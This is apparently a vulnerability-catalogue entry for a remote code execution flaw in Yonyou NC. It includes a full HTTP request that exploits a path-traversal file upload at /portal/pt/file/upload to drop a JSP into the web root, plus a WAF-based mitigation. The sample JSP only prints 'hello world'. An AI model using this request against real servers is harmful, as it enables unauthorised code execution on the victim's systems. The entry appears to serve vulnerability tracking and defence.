vendor = "用友"
name = "用友 NC 远程代码执行漏洞"
type = "RCE"
version = "未知"
path = "/portal/pt/file/upload"
detail = "POST /portal/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&i scover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=d0b7a0d40eed0e32904c8017b09eb305 --d0b7a0d40eed0e32904c8017b09eb305 Content-Disposition: form-data; name=\"file\"; filename=\"we.jsp\" Content-Type: text/plain <%out.print(\"hello world\");%> --d0b7a0d40eed0e32904c8017b09eb305--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "1day"
